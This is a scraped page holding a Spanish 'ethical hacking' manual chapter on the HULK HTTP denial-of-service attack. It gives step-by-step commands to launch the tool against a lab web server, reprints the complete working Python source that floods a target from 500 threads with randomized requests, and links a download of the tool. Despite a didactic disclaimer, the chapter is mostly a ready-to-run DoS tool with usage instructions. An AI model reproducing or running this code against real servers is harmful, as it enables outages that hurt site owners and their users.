• No se han encontrado resultados

Manual de Pentesting Sobre Ataque Web Python Hulk

N/A
N/A
Info
Descargar
Protected

Academic year: 2021

Share "Manual de Pentesting Sobre Ataque Web Python Hulk"

Copied!
15
0
0

Cargando.... (Ver texto completo ahora)

Descargar ahora ( 15 página )

Texto completo

(1)EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. Contacto: [email protected]. Página 1.

(2) EL ARTE DEL HACKING Libro de Et Ethical al Hacking para entrenamiento sobre ataques informáticos.. Edición patrocinada por WhiteHat México Descubre como es el Arte del Hacking de una visión de un White Hat.. Por. LSCA, Carlos Alberto Castruita Rodríguez Edición Independiente © 2015. Edición impresa en PDF protegida contra impresión y sobre escritura.. @gmail.com Contacto: [email protected]. Página 2.

(3) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. Descubre desde cero como es Arte del Hacking de una visión de un White Hat.. El libro de PENTESTING y de SEGURIDAD INFORMATICA está diseñado para hacer pruebas de vulnerabilidad de seguridad informática, robo de información y espionaje de datos, narrado a un nivel técnico para gentes con conocimiento de nivel básico a medio del área de informática o soporte técnico en sistemas.. Autor: Carlos Alberto Castruita Rodríguez Director de WhiteHat - México. Con 20 años de experiencia en el área sistemas.. Certificado Hellermann Tyton Certificado 3com Networks Ethical Hacker Certificado Contacto: [email protected]. Contacto: [email protected]. Página 3.

(4) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. ATAQUE A SERVIDORES WEB “ HULK ” Ataque de denegación de servicio con Python Hulk Se trata de un cliente HTTP capaz de provocar una denegación de servicio (DoS) a servidores web con poco uso de ancho de banda.. Dicho cliente HTTP intenta abrir tantas conexiones como pueda al servidor web e intenta mantenerlas abiertas tanto tiempo como sea posible. Periódicamente para evitar que el servidor web cierre la conexión va añadiendo headers a la petición HTTP sin llegar a finalizarla nunca.. Vamos a realizar un ataque controlado ya que si atacamos un servidor establecido incurriremos en un delito. Levante un servidor con IIS y monte el WampServer para poner una simple página web hecha en WordPress.. Contacto: [email protected]. Página 4.

(5) EL ARTE DEL HACKING Libro de Et Ethical al Hacking para entrenamiento sobre ataques informáticos.. Nuestro servidor web tiene la siguiente IP 192.168.0.100 Lo verificamos con el comando ipconfig. El ataque lo haremos os con una versión viejita de Python la versión 2.7.5 2.7 Esta versión funciona hasta Windows XP. En Windows 7 y 8 ya se baja otra versión.. Acezamos al folder de Python desde modo Dos. Python 2.7 lo puedes descargar escargar de GRATIS al final de la explicación. Hulk descárgalo igual al final de este mismo.. @gmail.com Contacto: [email protected]. Página 5.

(6) EL ARTE DEL HACKING Libro de Et Ethical al Hacking para entrenamiento sobre ataques informáticos.. SINTAXIS:. >> ESCRIBIR:. python.exe hulk.py <Url>. python.exe hulk.py http://192.168.0.100 { INTRO }. Y ahora si prepárense, por que el servidor WEB se va a colapsar.. Haremos el mismo ejerció en Linux. En Ubuntu es muy fácil instalar el Python. Iremos al centro de Software que maneja Ubuntu y después seleccionamos la opción Herramienta para Desarrolladores.. @gmail.com Contacto: [email protected]. Página 6.

(7) EL ARTE DEL HACKING Libro de Et Ethical al Hacking para entrenamiento sobre ataques informáticos.. Ahora escogemos Python y lo instalamos. Ya instalado el Python abrimos una terminal, recuerda que se abre con CTRL+ALT+T. CTRL+ALT+. El archivo Hulk.py lo pegamos en Personal Folder para que no te sea difícil el llamar el archivo. Usaremos la misma sintaxis que usamos dentro de Windows.. SINTAXIS: >> ESCRIBIR:. python.exe hulk.py <Url> python.exe hulk.py http://192.168.0.100 { INTRO }. @gmail.com Contacto: [email protected]. Página 7.

(8) EL ARTE DEL HACKING Libro de Et Ethical al Hacking para entrenamiento sobre ataques informáticos.. Ahora nos aparecerá el letrero – HULK Attack Started – El ataque se ha iniciado y dejaremos que se envíen las peticiones al server.. NOTA IMPORTANTE: Estos ejercicios de ataques son con fines didácticos y no atacamos a ninguna empresa ni entidad gubernamental, son ataques 100% controlados. Es bajo propia responsabilidad del lector, el uso que haga de estos conocimientos. Yo como escritor e investigador de técnicas de ataque a medios informáticos, informáticos que cada uno de mis ejercicios de ataques a redes, servidores, equipos informáticos y telefónicos son bajo ambiente controlado, con infraestructura propia y no causando daño a terceros. Expongo los ejercicios que yo como técnico informático a mi persona me han funcionado y dejo visto como un Black Hacker puede atacar un equipo electrónico.. @gmail.com Contacto: [email protected]. Página 8.

(9) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. Anexo copia del código fuente de Hulk desarrollado por Barry Shteiman. # ---------------------------------------------------------------------------------------------# HULK - HTTP Unbearable Load King # # this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them # to their knees by exhausting the resource pool, its is meant for research purposes only # and any malicious usage of this tool is prohibited. # # author : Barry Shteiman , version 1.0 # ---------------------------------------------------------------------------------------------import urllib2 import sys import threading import random import re. #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0. def inc_counter(): global request_counter. Contacto: [email protected]. Página 9.

(10) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. request_counter+=1. def set_flag(val): global flag flag=val. def set_safe(): global safe safe=1. # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') return(headers_useragents). Contacto: [email protected]. Página 10.

(11) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://' + host + '/') return(headers_referers). #builds random ascii string def buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str). def usage(): print '---------------------------------------------------' print 'USAGE: python hulk.py <url>' print 'you can add "safe" after url, to autoshut after dos' print '---------------------------------------------------'. #http request def httpcall(url): useragent_list() referer_list(). Contacto: [email protected]. Página 11.

(12) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. code=0 if url.count("?")>0: param_joiner="&" else: param_joiner="?" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print 'Response Code 500' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code). Contacto: [email protected]. Página 12.

(13) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==500) & (safe==1): set_flag(2) except Exception, ex: pass. # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+100<request_counter) & (previous<>request_counter): print "%d Requests Sent" % (request_counter) previous=request_counter if flag==2: print "\n-- HULK Attack Finished --". #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]=="help": usage(). Contacto: [email protected]. Página 13.

(14) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. sys.exit() else: print "-- HULK Attack Started --" if len(sys.argv)== 3: if sys.argv[2]=="safe": set_safe() url = sys.argv[1] if url.count("/")==2: url = url + "/" m = re.search('http\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread() t.start(). Es muy fácil entender la lógica de funcionamiento del código y uno puede hasta hacerle mejoras al mismo código pero como indica el mismo autor del mismo que es un delito el uso malicioso para ataque DOS.. Contacto: [email protected]. Página 14.

(15) EL ARTE DEL HACKING Libro de Ethical Hacking para entrenamiento sobre ataques informáticos.. BONUS Descargas de Software libre de Compra de Licencia. WhiteHat México tiene esas aplicaciones en la nube, listas para descargar.. WINDOWS: •. Python 2.7.5 URL:. QR:. • Hulk URL: https://mega.co.nz/#!OIpCDTgA!ikGOVC833_Y0nGtVsgXJPqmjfvcpqpNj19yjdVrdS80. QR:. Contacto: [email protected]. Página 15.

(16)

Referencias

Descargar ahora ( PDF - 15 página - 1.27 MB )

Documento similar

17-18

Departamento LENGUAJES Y SISTEMAS INFORMÁTICOS, INTELIGENCIA ARTIFICIAL, INFORMÁTICA Y AUTOMÁTICA, INGENIERÍA DEL SOFTW.. INFORMÁTICOS, SISTEMAS DE COMUNICACIÓN

EL CASO DE LA CÁTEDRA DE INVESTIGACIÓN DE INNOVACIÓN EN TECNOLOGÍA Y EDUCACIÓN DEL TECNOLÓGICO DE MONTERREY María Soledad Ramírez Montoya Nuevas preguntas, nuevas respuestas: una introducción a la temática Ramírez, M

El contar con el financiamiento institucional a través de las cátedras ha significado para los grupos de profesores, el poder centrarse en estudios sobre áreas de interés

SOBRE LA TUMBA DE COSTAA LA MAS CLARA MEMORIA DE UN ESPIRITU SINCERO

Entre nosotros anda un escritor de cosas de filología, paisano de Costa, que no deja de tener ingenio y garbo; pero cuyas obras tienen de todo menos de ciencia, y aun

EVALUACIÓN DE PUESTO: PAS SERVICIOS INFORMÁTICOS

PLANTA 0: DPTO DE ENERGÉTICA Caída al mismo nivel en el tránsito por la sección por la presencia de cableado en zonas de paso, en puesto de trabajo, posible existencia de

GESTIÓN DE PROYECTOS EN LAS

Todo ello, hace imprescindible la existencia de una Metodología de Gestión de Proyectos Informáticos que sirva de marco común de actuación no solamente a los empleados informáticos

LA EXHIBICIÓN DE DOCUMENTOS PROBATORIOS Y SOPORTES INFORMÁTICOS

La cualidad de tercero viene definida por la ajenidad en la relación jurídica controvertida, entendida como no ser parte de la misma, ni haber de alguna manera provocado

Protocolo de comunicaciones para robots de servicios basado en Sockets

(Q FRQWUDVWH ORV FOLHQWHV \ VHUYLGRUHV TXH XVDQ 8'3 VH FDUDFWHUL]DQ SRU QR WHQHU JDUDQWtDV VREUH OD ILDELOLGDG GH OD HQWUHJD &amp;XDQGR XQ FOLHQWH HQYtD

Estudio de herramientas de desarrollo de software basado en modelos: MDA y factorías de softwre

En este documento se plasma la realización de un estudio de mercado de herramientas de desarrollo software de última generación para la realización de aplicaciones web, orientadas